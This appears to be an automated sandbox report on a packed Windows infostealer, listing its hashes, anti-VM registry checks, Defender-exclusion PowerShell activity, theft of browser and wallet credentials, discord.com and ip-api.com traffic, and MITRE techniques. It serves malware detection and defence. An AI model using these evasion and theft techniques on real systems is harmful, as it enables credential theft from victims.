6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31

Analysis

max time kernel
94s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2025 06:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Size

8.7MB
MD5

41b147fd16a94a8ea6164177cf91733c
SHA1

f586388782d636b286ef606de997087f451fe11f
SHA256

6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
SHA512

c15b8cc463186471a12431131d90733f9389d2eded969ee056b1bfe391ab255fc88c4f1b896e05dc6d4f94cba82bf066316fca489047781e13ddfd522e9e5da0
SSDEEP

196608:lPWgT2X83i4bCFRu3TN9hoy6Enwc4GgpG0REtHIrq7L3mrbW3jmy+:lDKXe0c3jWyotGgpGLtz7bmrbmyJ

Score

9^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer themida trojan upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2956	powershell.exe
1868	powershell.exe
2892	powershell.exe
4888	powershell.exe
2600	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0031000000023b72-27.dat	acprotect
behavioral2/files/0x000a000000023b65-33.dat	acprotect
behavioral2/files/0x0031000000023b70-35.dat	acprotect
behavioral2/files/0x000a000000023b6f-40.dat	acprotect
behavioral2/files/0x0031000000023b71-41.dat	acprotect
behavioral2/files/0x000a000000023b6c-54.dat	acprotect
behavioral2/files/0x000a000000023b6b-53.dat	acprotect
behavioral2/files/0x000a000000023b6a-52.dat	acprotect
behavioral2/files/0x000a000000023b69-51.dat	acprotect
behavioral2/files/0x000a000000023b68-50.dat	acprotect
behavioral2/files/0x000a000000023b67-49.dat	acprotect
behavioral2/files/0x000a000000023b66-48.dat	acprotect
behavioral2/files/0x000a000000023b64-47.dat	acprotect
behavioral2/files/0x000a000000023b77-46.dat	acprotect
behavioral2/files/0x000a000000023b76-45.dat	acprotect
behavioral2/files/0x000a000000023b75-44.dat	acprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2560	powershell.exe
3284	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4904	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/1208-0-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/1208-3-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/1208-2-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2432-26-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2432-25-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/1208-63-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2432-75-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/1208-224-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/1208-373-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2432-401-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/1208-431-0x0000000000400000-0x0000000000B47000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4376	tasklist.exe
3792	tasklist.exe
1448	tasklist.exe
4540	tasklist.exe
4920	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3304	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1208	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0031000000023b72-27.dat	upx
behavioral2/memory/2432-30-0x0000000074CD0000-0x00000000751DB000-memory.dmp	upx
behavioral2/files/0x000a000000023b65-33.dat	upx
behavioral2/memory/2432-36-0x0000000074C80000-0x0000000074C9F000-memory.dmp	upx
behavioral2/files/0x0031000000023b70-35.dat	upx
behavioral2/memory/2432-38-0x0000000074C70000-0x0000000074C7D000-memory.dmp	upx
behavioral2/files/0x000a000000023b6f-40.dat	upx
behavioral2/files/0x0031000000023b71-41.dat	upx
behavioral2/files/0x000a000000023b6c-54.dat	upx
behavioral2/files/0x000a000000023b6b-53.dat	upx
behavioral2/files/0x000a000000023b6a-52.dat	upx
behavioral2/files/0x000a000000023b69-51.dat	upx
behavioral2/files/0x000a000000023b68-50.dat	upx
behavioral2/files/0x000a000000023b67-49.dat	upx
behavioral2/files/0x000a000000023b66-48.dat	upx
behavioral2/files/0x000a000000023b64-47.dat	upx
behavioral2/files/0x000a000000023b77-46.dat	upx
behavioral2/files/0x000a000000023b76-45.dat	upx
behavioral2/files/0x000a000000023b75-44.dat	upx
behavioral2/memory/2432-60-0x0000000074C40000-0x0000000074C67000-memory.dmp	upx
behavioral2/memory/2432-67-0x0000000074AC0000-0x0000000074BF7000-memory.dmp	upx
behavioral2/memory/2432-66-0x0000000074C00000-0x0000000074C1B000-memory.dmp	upx
behavioral2/memory/2432-65-0x0000000074C20000-0x0000000074C38000-memory.dmp	upx
behavioral2/memory/2432-69-0x0000000074AA0000-0x0000000074AB6000-memory.dmp	upx
behavioral2/memory/2432-78-0x0000000074720000-0x000000007497A000-memory.dmp	upx
behavioral2/memory/2432-80-0x0000000074A20000-0x0000000074A48000-memory.dmp	upx
behavioral2/memory/2432-77-0x0000000074980000-0x0000000074A14000-memory.dmp	upx
behavioral2/memory/2432-76-0x0000000074A50000-0x0000000074A5C000-memory.dmp	upx
behavioral2/memory/2432-83-0x0000000074CD0000-0x00000000751DB000-memory.dmp	upx
behavioral2/memory/2432-84-0x00000000746B0000-0x00000000746C0000-memory.dmp	upx
behavioral2/memory/2432-85-0x00000000746A0000-0x00000000746AC000-memory.dmp	upx
behavioral2/memory/2432-87-0x0000000074C80000-0x0000000074C9F000-memory.dmp	upx
behavioral2/memory/2432-88-0x0000000074570000-0x0000000074689000-memory.dmp	upx
behavioral2/memory/2432-201-0x0000000074AC0000-0x0000000074BF7000-memory.dmp	upx
behavioral2/memory/2432-200-0x0000000074C00000-0x0000000074C1B000-memory.dmp	upx
behavioral2/memory/2432-225-0x0000000074AA0000-0x0000000074AB6000-memory.dmp	upx
behavioral2/memory/2432-236-0x0000000074980000-0x0000000074A14000-memory.dmp	upx
behavioral2/memory/2432-237-0x0000000074720000-0x000000007497A000-memory.dmp	upx
behavioral2/memory/2432-260-0x0000000074C80000-0x0000000074C9F000-memory.dmp	upx
behavioral2/memory/2432-274-0x0000000074A20000-0x0000000074A48000-memory.dmp	upx
behavioral2/memory/2432-273-0x0000000074570000-0x0000000074689000-memory.dmp	upx
behavioral2/memory/2432-272-0x00000000746A0000-0x00000000746AC000-memory.dmp	upx
behavioral2/memory/2432-259-0x0000000074CD0000-0x00000000751DB000-memory.dmp	upx
behavioral2/memory/2432-386-0x0000000074CD0000-0x00000000751DB000-memory.dmp	upx
behavioral2/memory/2432-392-0x0000000074AC0000-0x0000000074BF7000-memory.dmp	upx
behavioral2/memory/2432-387-0x0000000074C80000-0x0000000074C9F000-memory.dmp	upx
behavioral2/memory/2432-402-0x0000000074CD0000-0x00000000751DB000-memory.dmp	upx
behavioral2/memory/2432-427-0x0000000074980000-0x0000000074A14000-memory.dmp	upx
behavioral2/memory/2432-429-0x00000000746B0000-0x00000000746C0000-memory.dmp	upx
behavioral2/memory/2432-428-0x0000000074720000-0x000000007497A000-memory.dmp	upx
behavioral2/memory/2432-426-0x0000000074A50000-0x0000000074A5C000-memory.dmp	upx
behavioral2/memory/2432-425-0x0000000074AA0000-0x0000000074AB6000-memory.dmp	upx
behavioral2/memory/2432-424-0x00000000746A0000-0x00000000746AC000-memory.dmp	upx
behavioral2/memory/2432-423-0x0000000074C20000-0x0000000074C38000-memory.dmp	upx
behavioral2/memory/2432-422-0x0000000074C40000-0x0000000074C67000-memory.dmp	upx
behavioral2/memory/2432-421-0x0000000074C70000-0x0000000074C7D000-memory.dmp	upx
behavioral2/memory/2432-420-0x0000000074C80000-0x0000000074C9F000-memory.dmp	upx
behavioral2/memory/2432-419-0x0000000074AC0000-0x0000000074BF7000-memory.dmp	upx
behavioral2/memory/2432-418-0x0000000074A20000-0x0000000074A48000-memory.dmp	upx
behavioral2/memory/2432-417-0x0000000074C00000-0x0000000074C1B000-memory.dmp	upx
behavioral2/memory/2432-416-0x0000000074570000-0x0000000074689000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1524	cmd.exe
2272	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
972	cmd.exe
1096	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1460	WMIC.exe
1552	WMIC.exe
2336	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4772	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2272	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1208	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
1208	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2956	powershell.exe
2600	powershell.exe
2600	powershell.exe
2956	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe
2560	powershell.exe
2560	powershell.exe
2984	powershell.exe
2984	powershell.exe
2560	powershell.exe
2984	powershell.exe
2892	powershell.exe
2892	powershell.exe
4424	powershell.exe
4424	powershell.exe
4888	powershell.exe
4888	powershell.exe
3104	powershell.exe
3104	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3208	WMIC.exe
Token: SeSecurityPrivilege	3208	WMIC.exe
Token: SeTakeOwnershipPrivilege	3208	WMIC.exe
Token: SeLoadDriverPrivilege	3208	WMIC.exe
Token: SeSystemProfilePrivilege	3208	WMIC.exe
Token: SeSystemtimePrivilege	3208	WMIC.exe
Token: SeProfSingleProcessPrivilege	3208	WMIC.exe
Token: SeIncBasePriorityPrivilege	3208	WMIC.exe
Token: SeCreatePagefilePrivilege	3208	WMIC.exe
Token: SeBackupPrivilege	3208	WMIC.exe
Token: SeRestorePrivilege	3208	WMIC.exe
Token: SeShutdownPrivilege	3208	WMIC.exe
Token: SeDebugPrivilege	3208	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3208	WMIC.exe
Token: SeRemoteShutdownPrivilege	3208	WMIC.exe
Token: SeUndockPrivilege	3208	WMIC.exe
Token: SeManageVolumePrivilege	3208	WMIC.exe
Token: 33	3208	WMIC.exe
Token: 34	3208	WMIC.exe
Token: 35	3208	WMIC.exe
Token: 36	3208	WMIC.exe
Token: SeDebugPrivilege	4376	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3208	WMIC.exe
Token: SeSecurityPrivilege	3208	WMIC.exe
Token: SeTakeOwnershipPrivilege	3208	WMIC.exe
Token: SeLoadDriverPrivilege	3208	WMIC.exe
Token: SeSystemProfilePrivilege	3208	WMIC.exe
Token: SeSystemtimePrivilege	3208	WMIC.exe
Token: SeProfSingleProcessPrivilege	3208	WMIC.exe
Token: SeIncBasePriorityPrivilege	3208	WMIC.exe
Token: SeCreatePagefilePrivilege	3208	WMIC.exe
Token: SeBackupPrivilege	3208	WMIC.exe
Token: SeRestorePrivilege	3208	WMIC.exe
Token: SeShutdownPrivilege	3208	WMIC.exe
Token: SeDebugPrivilege	3208	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3208	WMIC.exe
Token: SeRemoteShutdownPrivilege	3208	WMIC.exe
Token: SeUndockPrivilege	3208	WMIC.exe
Token: SeManageVolumePrivilege	3208	WMIC.exe
Token: 33	3208	WMIC.exe
Token: 34	3208	WMIC.exe
Token: 35	3208	WMIC.exe
Token: 36	3208	WMIC.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeIncreaseQuotaPrivilege	1460	WMIC.exe
Token: SeSecurityPrivilege	1460	WMIC.exe
Token: SeTakeOwnershipPrivilege	1460	WMIC.exe
Token: SeLoadDriverPrivilege	1460	WMIC.exe
Token: SeSystemProfilePrivilege	1460	WMIC.exe
Token: SeSystemtimePrivilege	1460	WMIC.exe
Token: SeProfSingleProcessPrivilege	1460	WMIC.exe
Token: SeIncBasePriorityPrivilege	1460	WMIC.exe
Token: SeCreatePagefilePrivilege	1460	WMIC.exe
Token: SeBackupPrivilege	1460	WMIC.exe
Token: SeRestorePrivilege	1460	WMIC.exe
Token: SeShutdownPrivilege	1460	WMIC.exe
Token: SeDebugPrivilege	1460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1460	WMIC.exe
Token: SeRemoteShutdownPrivilege	1460	WMIC.exe
Token: SeUndockPrivilege	1460	WMIC.exe
Token: SeManageVolumePrivilege	1460	WMIC.exe
Token: 33	1460	WMIC.exe
Token: 34	1460	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 2432	1208	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	83
PID 1208 wrote to memory of 2432	1208	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	83
PID 1208 wrote to memory of 2432	1208	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	83
PID 2432 wrote to memory of 4192	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	84
PID 2432 wrote to memory of 4192	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	84
PID 2432 wrote to memory of 4192	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	84
PID 2432 wrote to memory of 1120	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	85
PID 2432 wrote to memory of 1120	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	85
PID 2432 wrote to memory of 1120	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	85
PID 2432 wrote to memory of 1820	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	86
PID 2432 wrote to memory of 1820	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	86
PID 2432 wrote to memory of 1820	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	86
PID 2432 wrote to memory of 3196	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	87
PID 2432 wrote to memory of 3196	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	87
PID 2432 wrote to memory of 3196	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	87
PID 2432 wrote to memory of 2128	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	92
PID 2432 wrote to memory of 2128	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	92
PID 2432 wrote to memory of 2128	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	92
PID 4192 wrote to memory of 2956	4192	cmd.exe	94
PID 4192 wrote to memory of 2956	4192	cmd.exe	94
PID 4192 wrote to memory of 2956	4192	cmd.exe	94
PID 3196 wrote to memory of 4376	3196	cmd.exe	95
PID 3196 wrote to memory of 4376	3196	cmd.exe	95
PID 3196 wrote to memory of 4376	3196	cmd.exe	95
PID 2128 wrote to memory of 3208	2128	cmd.exe	96
PID 2128 wrote to memory of 3208	2128	cmd.exe	96
PID 2128 wrote to memory of 3208	2128	cmd.exe	96
PID 1820 wrote to memory of 4568	1820	cmd.exe	97
PID 1820 wrote to memory of 4568	1820	cmd.exe	97
PID 1820 wrote to memory of 4568	1820	cmd.exe	97
PID 1120 wrote to memory of 2600	1120	cmd.exe	98
PID 1120 wrote to memory of 2600	1120	cmd.exe	98
PID 1120 wrote to memory of 2600	1120	cmd.exe	98
